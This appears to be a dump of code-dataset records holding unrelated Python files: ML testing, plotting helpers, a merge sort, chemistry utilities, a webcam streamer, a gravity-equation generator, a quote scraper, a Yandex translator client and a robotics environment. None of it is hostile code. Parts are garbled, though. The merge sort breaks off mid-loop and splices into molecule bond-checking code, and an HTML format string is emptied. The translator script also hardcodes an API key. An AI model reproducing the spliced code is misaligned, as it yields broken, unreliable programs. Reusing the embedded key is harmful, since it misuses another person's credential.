test_step(self):\n batch_x, batch_y = self.data.next_batch(batch_type=\"test\")\n\n feed_dict = {self.model.x: batch_x, self.model.y: batch_y, self.model.is_training: False,\n self.model.seq_len: batch_x.shape[1],\n self.model.keep_prob_lstm_out: 1.0,\n self.model.keep_prob_lstm_recurrent: 1.0,\n self.model.keep_prob_fc: 1.0}\n\n loss, acc = self.sess.run([self.model.cross_entropy, self.model.accuracy],\n feed_dict=feed_dict)\n\n return loss, acc\n","sub_path":"src/testers/sentiment_tester.py","file_name":"sentiment_tester.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"345996335","text":"from io import BytesIO\nimport base64\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom IPython.display import HTML\n# reset to matplotlib defaults rather than seaborn ones\nplt.rcdefaults()\n# Turn off the max column width so the images won't be truncated\npd.set_option('display.max_colwidth', -1)\n#Monkey patch the dataframe so the sparklines are displayed\npd.DataFrame._repr_html_ = lambda self: self.to_html(escape=False)\n\n# Display pandas linebreaks properly\n# Save the original `to_html` function to call it later\npd.DataFrame.base_to_html = pd.DataFrame.to_html\n# Call it here in a controlled way\npd.DataFrame.to_html = (\n lambda df, *args, **kwargs: \n (df.base_to_html(*args, **kwargs)\n .replace(r\"\\n\", \"
\"))\n)\n\n\ndef dist_plot(org_value,\n distribution,\n figsize=(3.5, 1),\n **kwags): \n \"\"\" Draws a matplotlib plot with a kde curve and a line for\n an individual institution.\n \n Parameters\n ----------\n org_value : float\n Value of the individual institution to be highlighted.\n distribution : pandas series\n Values to be used to draw the distribution.\n figsize : tuple, optional\n Size of figure. The default is (3.5, 1).\n **kwags : to be passed to plt.subplots.\n\n Returns\n -------\n plt : matplotlib plot\n\n \"\"\"\n fig, ax = plt.subplots(1,1,figsize=figsize,**kwags)\n sns.kdeplot(distribution,ax=ax,linewidth=0.9)\n ax.axvline(org_value,color='r',linewidth=1)\n ax = remove_clutter(ax)\n return plt\n\ndef sparkline_plot(series,\n figsize=(3.5, 1),\n **kwags):\n \"\"\"\n \n\n Parameters\n ----------\n series : pandas timeseries\n Timeseries to be plotted.\n figsize : tuple, optional\n Size of figure. The default is (3.5, 1).\n **kwags : to be passed to plt.subplots.\n\n Returns\n -------\n plt : matplotlib plot\n\n \"\"\"\n\n fig, ax = plt.subplots(1,1,figsize=figsize,**kwags)\n series.reset_index().plot(ax=ax,linewidth=0.9)\n ax = remove_clutter(ax)\n return plt\n\ndef remove_clutter(ax):\n ax.legend()#_.remove()\n ax.legend_.remove()\n for k,v in ax.spines.items():\n v.set_visible(False)\n ax.tick_params(labelsize=5)\n ax.set_yticks([])\n #ax.set_xticks([])\n ax.xaxis.set_label_text('')\n plt.tight_layout()\n return ax\n\ndef html_plt(plt):\n \"\"\" Converts a matplotlib plot into an html image.\n \n Parameters\n ----------\n plt : matplotlib figure\n\n Returns\n -------\n html_plot : html image\n\n \"\"\"\n img = BytesIO()\n plt.savefig(img, transparent=True)\n plt.close()\n html_plot = ''.format(\n base64.b64encode(img.getvalue()).decode())\n return html_plot\n\ndef get_stats(df,\n measure='measure',\n aggregators=['code']):\n #1 calculate stats\n agg = df.groupby(aggregators).agg(['mean','std','skew'])[measure]\n kurtosis = df.groupby(aggregators).apply(pd.DataFrame.kurt)\n agg['kurtosis'] = kurtosis[measure]\n df = df.join(agg)\n #2 calculate the # of std deviations an entity is away from the mean\n df['z_score'] = (df[measure]-agg['mean'])/agg['std']\n #self['z_score'] = self['z_score'].abs() # change to absolute values\n df = df.dropna()\n return df\n\ndef dist_table(df, column, subset=None):\n if subset is not None:\n index = subset\n else:\n index = df.index\n series = pd.Series(index=index,name='plots')\n for idx in index:\n plot = dist_plot(df.loc[idx,column],\n df.loc[idx[0],column])\n series.loc[idx] = html_plt(plot)\n df = df.join(series, how='right')\n df = df.round(decimals=2)\n return HTML(df.to_html(escape=False))\n\ndef sparkline_table(df, column, subset=None):\n if subset is not None:\n index = subset\n else:\n index = df.index\n series = pd.Series(index=index,name='plots')\n for idx in index:\n plot = sparkline_plot(df.loc[idx,column])\n series.loc[idx] = html_plt(plot)\n df = df.join(series, how='right')\n df = df.round(decimals=2)\n series['one'] = 1\n return series\n","sub_path":"outliers.py","file_name":"outliers.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"587303332","text":"def merge_sort(unsorted):\n if len(unsorted)>1: #recursive case\n half=len(unsorted)//2\n beginning=unsorted[:half]\n end=unsorted[half:]\n merge_sort(beginning)\n merge_sort(end)\n original=0\n fresh=0\n new=0\n while original min_bond\n and distance\n <= (atomic_radii[elements[atom1]] + atomic_radii[elements[atom2]])\n * bond_scale\n ):\n bonds[(atom1, atom2)] = distance\n else:\n if distance > min_bond and distance < max_bond:\n bonds[(atom1, atom2)] = distance\n\n return bonds\n\n\ndef calculate_molecular_mass(symbols):\n \"\"\"Calculate the mass of a molecule.\n\n Parameters\n ----------\n symbols : dict or list\n A dict or list of elements.\n\n Returns\n -------\n mass : float\n The mass of the molecule\n \"\"\"\n\n mass = 0\n # for atom in symbols:\n for i in range(len(symbols)):\n mass += atomic_weights[symbols[i]]\n\n return mass\n\n\ndef calculate_center_of_mass(symbols, coordinates):\n \"\"\"Calculate the center of mass of a molecule.\n\n The center of mass is weighted by each atom's weight.\n\n Parameters\n ----------\n symbols : dict or list\n A dict or list of elements for the molecule\n coordinates : np.ndarray\n The coordinates of the molecule.\n\n Returns\n -------\n center_of_mass: np.ndarray\n The center of mass of the molecule.\n\n Notes\n -----\n The center of mass is calculated with the formula\n\n .. math:: \\\\vec{R}=\\\\frac{1}{M} \\\\sum_{i=1}^{n} m_{i}\\\\vec{r_{}i}\n\n \"\"\"\n\n total_mass = calculate_molecular_mass(symbols)\n\n mass_array = np.zeros([len(symbols), 1])\n\n for i in range(len(symbols)):\n mass_array[i] = atomic_weights[symbols[i]]\n\n center_of_mass = sum(coordinates * mass_array) / total_mass\n\n return center_of_mass\n\n\n# Conversion from amu to grams\ndef AMU2GRAM(mass):\n return mass * 1.6605e-24\n\n\n# Conversions between cubic Angstroms and cubic centimeters\ndef CA2CC(length):\n return length * 1.0e-24\n\n\ndef calculate_density(symbols, volume):\n \"\"\"Calculate the density of a molecule.\n\n Parameters\n ----------\n symbols : dict or list\n A dict or list of elements for the molecule\n volume : float\n The volume of the molecule in cubic Angstroms\n\n Returns\n -------\n density : float\n The density of the molecule in grams per cubic centimeter\n \"\"\"\n\n mass = calculate_molecular_mass(symbols)\n return AMU2GRAM(mass) / CA2CC(volume)\n","sub_path":"simtool/polymerxtal/crystal/molecule.py","file_name":"molecule.py","file_ext":"py","file_size_in_byte":5348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"545055597","text":"\"\"\"\nPython Crash Course, Third Edition https://ehmatthes.github.io/pcc_3e/\nMy notes: https://github.com/egalli64/pythonesque/pcc3\n\nChapter 15 - Rolling Dice with Plotly - Rolling Two Dice\n\"\"\"\nimport plotly.express as px\nfrom e3a_die import Die\n\ndice = (Die(), Die())\n\nresults = []\nfor roll_num in range(1000):\n results.append(dice[0].roll() + dice[1].roll())\n\nfrequencies = []\nvalues = range(2, dice[0].num_sides + dice[1].num_sides + 1)\nfor value in values:\n frequencies.append(results.count(value))\n\ntitle = \"Results of Rolling Two Dice 6 Values 1,000 Times\"\nlabels = {'x': 'Result', 'y': 'Frequency of Result'}\n\nfig = px.bar(x=values, y=frequencies, title=title, labels=labels)\n# each column has its tick\nfig.update_layout(xaxis_dtick=1)\n\nfig.show()\n","sub_path":"pcc3/ch15/e3c_2dice.py","file_name":"e3c_2dice.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"341256010","text":"import cv2\nimport socket\nfrom termcolor import colored\nfrom time import sleep\nimport base64\nimport zmq\n\ncontext=zmq.Context()\nclient_socket=context.socket(zmq.PUB)\nclient_socket.connect('tcp://localhost:5555')\n\n\n\n\nprint(colored(\"Starting....\",\"cyan\"))\n\n\n\n\nif __name__=='__main__':\n\n camera=input(\"Select the number of the camera ( 0 if error ) :\")\n camera=int(camera)\n\n try:\n vid=cv2.VideoCapture(camera)\n print( colored(f\"Camera number {camera} activated\",'cyan') )\n except Exception:\n print( colored(f\"Error activating camera number {camera}. We will try to activate camera number 0\",'orange'))\n try:\n vid=cv2.VideoCapture(0)\n print( colored(f\"Camera number {0} activated\",'cyan') )\n except Exception:\n print( colored(f\"No camera connected\",'red'))\n\n\n fps=input(\"Select the number of frames per second (between 10 and 60):\")\n fps=int(fps)\n if fps<30 or fps>60:\n fps=60\n\n print(colored(f\"Using {fps} fps\",'blue'))\n\n print(colored(\"Starting streaming\",\"green\"))\n\n while 1:\n try:\n success,img=vid.read()\n encoded,buffer=cv2.imencode('.jpg',img)\n package=base64.b64encode(buffer)\n client_socket.send(package)\n sleep(1/fps)\n except Exception as e:\n print(e)\n break\nelse:\n camera=int(0)\n vid=cv2.VideoCapture(camera) \n print( colored(f\"Camera number {camera} activated\",'cyan') )\n fps=int(60)\n print(colored(f\"Using {fps} fps\",'blue'))\n print(colored(\"Starting streaming\",\"green\"))\n\n while 1:\n try:\n success,img=vid.read()\n encoded,buffer=cv2.imencode('.jpg',img)\n package=base64.b64encode(buffer)\n client_socket.send(package)\n sleep(1/fps)\n except Exception as e:\n print(e)\n break\n\n","sub_path":"camera-server.py","file_name":"camera-server.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"570524623","text":"####################################################################\n# May.2020\n# Quad grav rhs generator new version\n#####################################################################\n\nimport dendro\nfrom sympy import *\n\nimport numpy as np\n###################################################################\n# initialize\n###################################################################\n\nl1, l2, l3, l4, eta = symbols('lambda[0] lambda[1] lambda[2] lambda[3] eta')\nlf0, lf1 = symbols('lambda_f[0] lambda_f[1]')\n\n#QG related constants\na_const = symbols('a_const')\nb_const = symbols('b_const')\nqg_mass0_sq = symbols('qg_mass0_sq')\nqg_mass2_sq = symbols('qg_mass0_sq')\n\nPI = 3.14159265358979323846\nkappa = 1/(16*PI)\n\n# Additional parameters for damping term\nR0 = symbols('QUADGRAV_ETA_R0')\nep1, ep2 = symbols('QUADGRAV_ETA_POWER[0] QUADGRAV_ETA_POWER[1]')\n\n# declare variables (BSSN vars)\na = dendro.scalar(\"alpha\", \"[pp]\")\nchi = dendro.scalar(\"chi\", \"[pp]\")\nK = dendro.scalar(\"K\", \"[pp]\")\n\nGt = dendro.vec3(\"Gt\", \"[pp]\")\nb = dendro.vec3(\"beta\", \"[pp]\")\nB = dendro.vec3(\"B\", \"[pp]\")\n\ngt = dendro.sym_3x3(\"gt\", \"[pp]\")\nAt = dendro.sym_3x3(\"At\", \"[pp]\")\n\nGt_rhs = dendro.vec3(\"Gt_rhs\", \"[pp]\")\n\n# Ricci scalar, R \nRsc = dendro.scalar(\"Rsc\", \"[pp]\")\n# Aux Ricci scalar, R^\nRsch = dendro.scalar(\"Rsch\", \"[pp]\")\n\n\n#TODO : Clear up for documentation\n# Ricci tensor, R_ab\n#Rab = dendro.sym_3x3(\"Rab\", \"[pp]\")\n# Aux Ricci tensor, V_ab\n#Vab = dendro.sym_3x3(\"Vab\", \"[pp]\")\n\n# Spatial projection of Ricci tensor related quantities\n# From R_ab \nAtr = dendro.scalar(\"Atr\", \"[pp]\")\nAij = dendro.sym_3x3(\"Aij\", \"[pp]\")\n# From V_ab \nBtr = dendro.scalar(\"Btr\", \"[pp]\")\nBij = dendro.sym_3x3(\"Bij\", \"[pp]\")\n\n# Additional constraint as evolutions vars\nCi = dendro.vec3(\"Ci\",\"[pp]\")\n#Ei = dendro.vec3(\"Ei\",\"[pp]\")\n\n# Lie derivative weight\nweight = -Rational(2,3)\nweight_Gt = Rational(2,3)\n\n# specify the functions for computing first and second derivatives\nd = dendro.set_first_derivative('grad') # first argument is direction\nd2s = dendro.set_second_derivative('grad2') # first 2 arguments are directions\nad = dendro.set_advective_derivative('agrad') # first argument is direction\nkod = dendro.set_kreiss_oliger_dissipation('kograd')\n\n'''\nSymbolic differentiation rules\ndendro.d = lambda i,x : symbols(\"grad_%d_%s\"%(i,x))\ndendro.ad = lambda i,x : symbols(\"agrad_%d_%s\"%(i,x))\ndendro.kod = lambda i,x : symbols(\"kograd_%d_%s\"%(i,x))\ndendro.d2 = lambda i,j,x : symbols(\"grad2_%d_%d_%s\"%(min(i,j),max(i,j),x))\n'''\n\nd2 = dendro.d2\n\n#f = Function('f')\n\n# generate metric related quantities\ndendro.set_metric(gt)\nigt = dendro.get_inverse_metric()\n\nC1 = dendro.get_first_christoffel()\nC2 = dendro.get_second_christoffel()\n#what's this...tried to comment it out and python compilation fails\nC2_spatial = dendro.get_complete_christoffel(chi)\nR, Rt, Rphi, CalGt = dendro.compute_ricci(Gt, chi)\nRie = dendro.compute_riemann()\n###################################################################\n# evolution equations\n###################################################################\n\n# Gauge part\n# For lapse, 1+log. For shift, modified gamma driver\na_rhs = l1*dendro.lie(b, a) - 2*a*K + 0*dendro.kodiss(a)\n\nb_rhs = [ S(3)/4 * (lf0 + lf1*a) * B[i] +\n l2 * dendro.vec_j_ad_j(b, b[i])\n for i in dendro.e_i ] + 0*dendro.kodiss(b)\n\neta_func = R0*sqrt(sum([igt[i,j]*d(i,chi)*d(j,chi) for i,j in dendro.e_ij]))/((1-chi**ep1)**ep2)\n\nB_rhs = [Gt_rhs[i] - eta_func * B[i] +\n l3 * dendro.vec_j_ad_j(b, B[i]) -\n l4 * dendro.vec_j_ad_j(b, Gt[i]) + 0*kod(i,B[i])\n for i in dendro.e_i]\n\n# Metric and extrinsic curvature\n\ngt_rhs = dendro.lie(b, gt, weight) - 2*a*At + 0*dendro.kodiss(gt)\n\nchi_rhs = dendro.lie(b, chi, weight) + Rational(2,3) * (chi*a*K) + 0*dendro.kodiss(chi)\n\nAikAkj = Matrix([sum([At[i, k] * sum([dendro.inv_metric[k, l]*At[l, j] for l in dendro.e_i]) for k in dendro.e_i]) for i, j in dendro.e_ij])\n\n#NOTE : \"CAUTION\" THIS IS DIFFERENT THEN Atr for Ricci. \n#NOTE : The rho, S, and Sij in BSSN eqns are not \"physical\" matter.\n#Introduce not conformally transformed metric again\ngs = gt/chi\nigs = igt/chi\n\n# Define additional constraints\n# NOTE : Ci is considered as evolution variable but Ei is treated algebraically\n# Some precomputation/definition\nAij_UU = dendro.up_up(Aij)*(chi*chi)\nAiUjD = dendro.up_down(Aij)*chi\nCi_U = Matrix([sum([Ci[j]*igs[i,j] for j in dendro.e_i]) for i in dendro.e_i])\nKij = At + 1/3*gt*K\nKki = dendro.up_down(Kij)*chi\n\n# Ei is determined by the spatial projection of RHS of Eqn.47\ndiAiUjD = Matrix([sum([d(i, gt[i,k])*Aij[k,j] + igt[i,k]*d(i,Aij[k,j]) for i, k in dendro.e_ij]) for j in dendro.e_i])\nDiAiUjD = diAiUjD + Matrix([sum([sum([dendro.C3[k,k,l]*AiUjD[l,i] - dendro.C3[l,k,i]*AiUjD[k,l] for l in dendro.e_i]) for k in dendro.e_i]) for i in dendro.e_i]) \nEi = Matrix([sum([-Kki[k,i]*Ci[k] for k in dendro.e_i]) - K*Ci[i] - d(i,Atr)/3 + d(i,Rsc)/4 for i in dendro.e_i]) - DiAiUjD\n\nrho_qg = Rsc/4\nSi_qg = Matrix([[-Ci[0], -Ci[1], -Ci[2]]])\nSij_qg = Matrix([Aij[i,j] + gs[i,j]*Atr/3 + gs[i,j]*Rsc/4 for i,j in dendro.e_ij]).reshape(3,3)\nS_qg = sum([sum([Sij_qg[i,j]*igs[i,j] for i in dendro.e_i]) for j in dendro.e_i])\n\n# WARNING: ALL QG FEEDBACK INTO METRIC SECTOR SET TO ZERO BY HAND\nAt_rhs = dendro.lie(b, At, weight) + chi*dendro.trace_free( a*R - dendro.DiDj(a)-0*8*pi*Sij_qg) + a*(K*At - 2*AikAkj.reshape(3, 3)) + 0*dendro.kodiss(At)\n# WARNING: ALL QG FEEDBACK INTO METRIC SECTOR SET TO ZERO BY HAND\nK_rhs = dendro.lie(b, K) - dendro.laplacian(a,chi) + a*(K*K/3 + dendro.sqr(At)) + 0*4*pi*a*(rho_qg + S_qg) + 0*dendro.kodiss(K)\n\nAt_UU = dendro.up_up(At)\n\nGt_rhs = Matrix([sum(b[j]*ad(j,Gt[i]) for j in dendro.e_i) for i in dendro.e_i]) - \\\n Matrix([sum(CalGt[j]*d(j,b[i]) for j in dendro.e_i) for i in dendro.e_i]) + \\\n Rational(2,3)*Matrix([ CalGt[i] * sum(d(j,b[j]) for j in dendro.e_i) for i in dendro.e_i ]) + \\\n Matrix([sum([igt[j, k] * d2(j, k, b[i]) + igt[i, j] * d2(j, k, b[k])/3 for j, k in dendro.e_ij]) for i in dendro.e_i]) - \\\n Matrix([sum([2*At_UU[i, j]*d(j, a) for j in dendro.e_i]) for i in dendro.e_i]) + \\\n Matrix([sum([2*a*dendro.C2[i, j, k]*At_UU[j, k] for j,k in dendro.e_ij]) for i in dendro.e_i]) - \\\n Matrix([sum([a*(3/chi*At_UU[i,j]*d(j, chi) + Rational(4,3)*dendro.inv_metric[i, j]*d(j, K)) for j in dendro.e_i]) for i in dendro.e_i])\n # + kod(i,Gt[i])\nn_vec = Matrix([[1/a, -b[0]/a, -b[1]/a, -b[2]/a]])\nGt_rhs = [item for sublist in Gt_rhs.tolist() for item in sublist]\n\n###################################################################\n# deleted the QG sector because metric sector is decoupled anyways\n###################################################################\n\n\n###################################################################\n# generate code\n###################################################################\n\n#outs = [a_rhs, b_rhs, gt_rhs, chi_rhs, At_rhs, K_rhs, Gt_rhs, B_rhs, Rsc_rhs, Rsch_rhs, Atr_rhs, Aij_rhs, Btr_rhs, Bij_rhs, Ci_rhs]\n#vnames = ['a_rhs', 'b_rhs', 'gt_rhs', 'chi_rhs', 'At_rhs', 'K_rhs', 'Gt_rhs', 'B_rhs', 'Rsc_rhs', 'Rsch_rhs', 'Atr_rhs', 'Aij_rhs', 'Btr_rhs', 'Bij_rhs', 'Ci_rhs']\nouts = [a_rhs, b_rhs, gt_rhs, chi_rhs, At_rhs, K_rhs, Gt_rhs, B_rhs]\nvnames = ['a_rhs', 'b_rhs', 'gt_rhs', 'chi_rhs', 'At_rhs', 'K_rhs', 'Gt_rhs', 'B_rhs']\n#outs = [Ci_rhs]\n#vnames = ['Ci_rhs']\n#dendro.generate_debug(outs, vnames)\ndendro.generate(outs, vnames, '[pp]')\n#numVars=len(outs)\n#for i in range(0,numVars):\n# dendro.generate_separate([outs[i]],[vnames[i]],'[pp]')\n","sub_path":"QuadGrav_ref/rhs_gen_scripts/quadgrav_test0_decoupledBSSN+noQG.py","file_name":"quadgrav_test0_decoupledBSSN+noQG.py","file_ext":"py","file_size_in_byte":7571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"564913172","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nfrom csv import DictWriter\r\nimport json\r\nfrom time import sleep\r\n\r\n\r\nurl = 'http://quotes.toscrape.com/'\r\n# Scrapes website for author's quotes, name, bio, and tags and writes into a text file.\r\ndef scrape_to_file(timer):\r\n # Receives user input for file name. We will use that file to record our scraped data.\r\n filename = get_filename() + '.txt'\r\n file = open(filename, 'w', encoding = \"utf-8\")\r\n \r\n # Scrapes from page one, the goal is to scrape until the last page.\r\n page_link = '/page/1'\r\n count = 1\r\n while page_link:\r\n response = requests.get(f'{url}{page_link}')\r\n soup = BeautifulSoup(response.text, 'html.parser')\r\n print(f'Now scraping {url}{page_link}...')\r\n # Searches for each relevant item on the page, and for each item: get it, add it into file.\r\n for each_quote in soup.find_all(class_='quote'):\r\n quote = each_quote.find(class_='text').get_text()\r\n author = each_quote.find(class_='author').get_text()\r\n bio_link = each_quote.find('a')['href']\r\n \r\n # Not every single quote has a tag. This allows our scraper to continue when a tag does not exist. \r\n try:\r\n tag = each_quote.find(class_='tag').get_text()\r\n except AttributeError:\r\n continue\r\n \r\n # Each biography is located in a different url. We will scrape that too.\r\n history = requests.get(f'{url}{bio_link}')\r\n history_soup = BeautifulSoup(history.text, 'html.parser')\r\n biography = history_soup.find(class_='author-description').get_text()\r\n author_born_date = history_soup.find(class_='author-born-date').get_text()\r\n author_born_location = history_soup.find(class_='author-born-location').get_text()\r\n \r\n # Formatting is arbitrary. This format returns 'quote' - 'author', 'born date' in 'location' 'tags':\r\n file.write(quote + ' - ' + author + ', born ' + author_born_date + \r\n ' ' + author_born_location + ' Tags: ' + tag + '\\n' +\r\n biography + '\\n \\n')\r\n \r\n # This print statement is to provide transparency for each action. Shows the program is running.\r\n # If this is annoying, remove this print statement.\r\n print('Scraping...')\r\n \r\n print(f'Page {count} Scraped! Data written to {filename}.') \r\n next_page = soup.find(class_='next')\r\n if next_page:\r\n page_link = next_page.find('a')['href']\r\n count += 1\r\n sleep(timer)\r\n else:\r\n page_link = False\r\n print(f'Website scraping complete! All data has been written to {filename}')\r\n file.close()\r\n \r\n\r\n# Receives the user's choice filename\r\ndef get_filename():\r\n # Make sure to double check, user!\r\n while True:\r\n choice = input('What would you like to name the file? ')\r\n while True:\r\n yes_or_no = input(f'Your filename will be {choice}. Is this what you want? Yes/No ').lower()\r\n if yes_or_no == 'yes' or yes_or_no == 'no':\r\n break\r\n if yes_or_no == 'yes':\r\n break\r\n return choice \r\n\r\n\r\n# Scrape the data into a csv or json file (up to the user)\r\ndef scrape_to_csv_or_json(format, timer):\r\n \r\n filename = get_filename()\r\n file_format = format\r\n complete_filename = filename + file_format\r\n page_link = '/page/1'\r\n count = 1\r\n data = []\r\n while page_link:\r\n response = requests.get(f'{url}{page_link}')\r\n soup = BeautifulSoup(response.text, 'html.parser')\r\n print(f'Now scraping {url}{page_link}...')\r\n # Searches for each relevant item on the page, and for each item: get it, add it into dictionary.\r\n for each_quote in soup.find_all(class_='quote'):\r\n \r\n bio_link = each_quote.find('a')['href']\r\n \r\n # Not every single quote has a tag. This allows our scraper to continue when a tag does not exist. \r\n try:\r\n tag = each_quote.find(class_='tag').get_text()\r\n except AttributeError:\r\n continue\r\n \r\n # Each biography is located in a different url. We will scrape that too.\r\n history = requests.get(f'{url}{bio_link}')\r\n history_soup = BeautifulSoup(history.text, 'html.parser')\r\n data.append({\r\n 'quote': each_quote.find(class_='text').get_text(),\r\n 'author': each_quote.find(class_='author').get_text(),\r\n 'tag': tag,\r\n 'biography': history_soup.find(class_='author-description').get_text(),\r\n 'date_born': history_soup.find(class_='author-born-date').get_text(),\r\n 'location_born': history_soup.find(class_='author-born-location').get_text()\r\n })\r\n\r\n print('Scraping...')\r\n # Continues to scrape until the last page\r\n print(f'Page {count} Scraped!')\r\n next_page = soup.find(class_='next')\r\n if next_page:\r\n page_link = next_page.find('a')['href']\r\n count += 1\r\n sleep(timer)\r\n else:\r\n page_link = False\r\n \r\n if file_format == '.csv': \r\n with open(complete_filename, 'w', encoding = \"utf-8\") as file:\r\n headers = ['quote', 'author', 'tag', 'biography', 'date_born', 'location_born']\r\n csv_writer = DictWriter(file, fieldnames = headers)\r\n csv_writer.writeheader()\r\n for quote in data:\r\n csv_writer.writerow(quote)\r\n print(f'Scraping completed! A .csv file, {complete_filename} has been created')\r\n \r\n elif file_format == '.json':\r\n with open(complete_filename, 'w', encoding = 'utf-8') as file:\r\n json.dump(data, file)\r\n print(f'Scraping completed! A .json file, {complete_filename} has been created')\r\n\r\n# Asks what file they want to save to. \r\ndef welcome():\r\n print('Welcome to my WebScraping project! You can save the data to a .txt file, .csv file, or .json file.')\r\n while True:\r\n choice = input('Take your pick: ').lower()\r\n if choice in 'json' or choice in 'csv' or choice in 'txt':\r\n break\r\n else:\r\n print('The choices are txt, csv, or json')\r\n return '.' + choice \r\n \r\n# Asks if the user wants to use the other 2 formats as well.\r\ndef again():\r\n while True:\r\n yes_or_no = input('Would you like to run the script again and try out the other two formats? ').lower()\r\n if yes_or_no == 'yes' or yes_or_no == 'no':\r\n break\r\n if yes_or_no == 'yes':\r\n return True\r\n else:\r\n return False\r\n\r\n# This will be passed into the sleep() function to determine how long you would like to wait inbetween pages. \r\ndef sleep_timer():\r\n while True:\r\n sleep = input('How long would you like to wait inbetween pages? ')\r\n try:\r\n val = int(sleep)\r\n break\r\n except ValueError:\r\n print('Please give an integer value!')\r\n return val\r\n\r\n# Main method. This is where we'll execute our code.\r\ndef main():\r\n while True:\r\n pick = welcome()\r\n sleep_time = sleep_timer()\r\n if pick in '.txt':\r\n scrape_to_file(sleep_time)\r\n elif pick in '.csv' or pick in '.json':\r\n scrape_to_csv_or_json(pick, sleep_time)\r\n if not again():\r\n break\r\n print('Thanks for using my work.')\r\n \r\n \r\nif __name__ == '__main__':\r\n main()","sub_path":"WebScrape.py","file_name":"WebScrape.py","file_ext":"py","file_size_in_byte":7723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"519874901","text":"import requests\n\n# time modulu ekle\n# ingilizce kelimeler ekle -> https://dictionary.yandex.net/api/v1/dicservice.json/lookup?key=dict.1.1.20210105T190252Z.1bf16a1a72629b11.f723d8b4f7f900313a0bcb5af8faab64c3fb2e46&lang=en-tr&text=run\n# baslangicta hangi ceviri yapmak istedigini sorsun sonra o sekilde devam etsin\n# Aranan kelimeler ve cevaplar bir database e kaydedilsin\n# Bu program icin bir arayuz tasarla\n# Gecmis sorgular - kayitlar buraya gelsin\n#ingilizce turkce veya turkce ingilizce (veya ingilizce ingilizce) arama yapilabilir\n\n\nwhile True:\n try:\n print(\"-\" * 50)\n ceviri_num = int(input(\"\"\"\n Turkce-Ingilizce ceviri icin 1'e basip Enter a basiniz.\n Ingilizce-Turkce ceviri icin 2'ye basip Enter a basiniz.\n \"\"\"))\n\n if ceviri_num == 1:\n aranan_kelime = input(\"\\nTurkce-Ingilizce ceviri icin Aranan kelimeyi giriniz: \")\n url = (\"https://dictionary.yandex.net/api/v1/dicservice.json/lookup?key=dict.1.1.20210105T190252Z.1bf16a1a72629b11.f723d8b4f7f900313a0bcb5af8faab64c3fb2e46&lang=tr-en&text=\" + aranan_kelime)\n r = requests.get(url)\n data = r.json()\n tr_eng_ilk_anlam = data[\"def\"][0][\"tr\"][0][\"text\"]\n synonims = data[\"def\"][0][\"tr\"][0][\"syn\"]\n print(\"Kelimenin ilk ve en cok kullanilan karsiligi:\\n\")\n print(tr_eng_ilk_anlam)\n print(\"\\nKelimenin esanlamlilari ve kullanilislari:\\n\")\n for i in synonims:\n print(i[\"text\"])\n else:\n aranan_kelime = input(\"\\nIngilizce-Turkce ceviri icin Aranan kelimeyi giriniz: \")\n url = (\"https://dictionary.yandex.net/api/v1/dicservice.json/lookup?key=dict.1.1.20210105T190252Z.1bf16a1a72629b11.f723d8b4f7f900313a0bcb5af8faab64c3fb2e46&lang=en-tr&text=\" + aranan_kelime)\n r = requests.get(url)\n data = r.json()\n eng_tr_ilk_anlam = data[\"def\"][0][\"tr\"][0][\"text\"]\n eng_tr_synonims = data[\"def\"][0][\"tr\"][0][\"syn\"]\n print(\"Kelimenin ilk ve en cok kullanilan karsiligi:\\n\")\n print(eng_tr_ilk_anlam)\n print(\"\\nKelimenin esanlamlilari ve kullanilislari:\\n\")\n for i in eng_tr_synonims:\n print(i[\"text\"])\n\n except:\n print(\"\\nAranan kelime bulunamadi lutfen baska bir kelime giriniz!\")\n","sub_path":"Apps/Translators/Yandex/Yandex Translator json tr-en dictionary v2.0.py","file_name":"Yandex Translator json tr-en dictionary v2.0.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"191595101","text":"from HER.envs import picknmove\nimport numpy as np \nfrom gym.envs.robotics.utils import mocap_set_action\n\nclass BaxterEnv(picknmove.BaxterEnv):\n \n def _get_rel_ob(self, absolute_ob):\n gripper_pos = absolute_ob[:self.space_dim]\n object_pos = absolute_ob[self.space_dim:2*self.space_dim]\n target_pos = absolute_ob[-self.space_dim:]\n\n return np.concatenate((gripper_pos, object_pos - gripper_pos, target_pos - object_pos))\n\n def _get_abs_ob(self, rel_ob):\n gripper_pos = rel_ob[:self.space_dim]\n object_pos = rel_ob[self.space_dim:2*self.space_dim] + gripper_pos\n target_pos = rel_ob[-self.space_dim:] + object_pos\n\n return np.concatenate((gripper_pos, object_pos, target_pos))\n\n def reset_model(self,\n # initial config of the end-effector\n gripper_pos = np.array([0.6 , 0.3 , 0.15]),\n ctrl=np.array([0.04, -0.04]),\n no_change_required = False\n ):\n\n absolute_ob = super(BaxterEnv, self).reset_model(gripper_pos = gripper_pos,\n ctrl=ctrl,\n no_change_required = no_change_required)\n return self._get_rel_ob(absolute_ob) \n\n def step(self, action):\n ob, total_reward, done, info = super(BaxterEnv, self).step(action)\n return self._get_rel_ob(ob), total_reward, done, info\n\n def apply_hindsight(self, states, actions, goal_state):\n '''generates hindsight rollout based on the goal\n '''\n goal = goal_state[self.space_dim:2*self.space_dim] ## this is the absolute goal location = obj last loc\n # enter the last state in the list\n states.append(goal_state)\n num_tuples = len(actions)\n\n her_states, her_rewards = [], []\n # make corrections in the first state \n states[0][-self.space_dim:] = goal.copy() - states[0][self.space_dim:2*self.space_dim]\n her_states.append(states[0])\n for i in range(1, num_tuples + 1):\n state = states[i]\n state[-self.space_dim:] = goal.copy() - state[self.space_dim:2*self.space_dim] # copy the new goal into state\n \n absolute_state = self._get_abs_ob(state)\n reward = 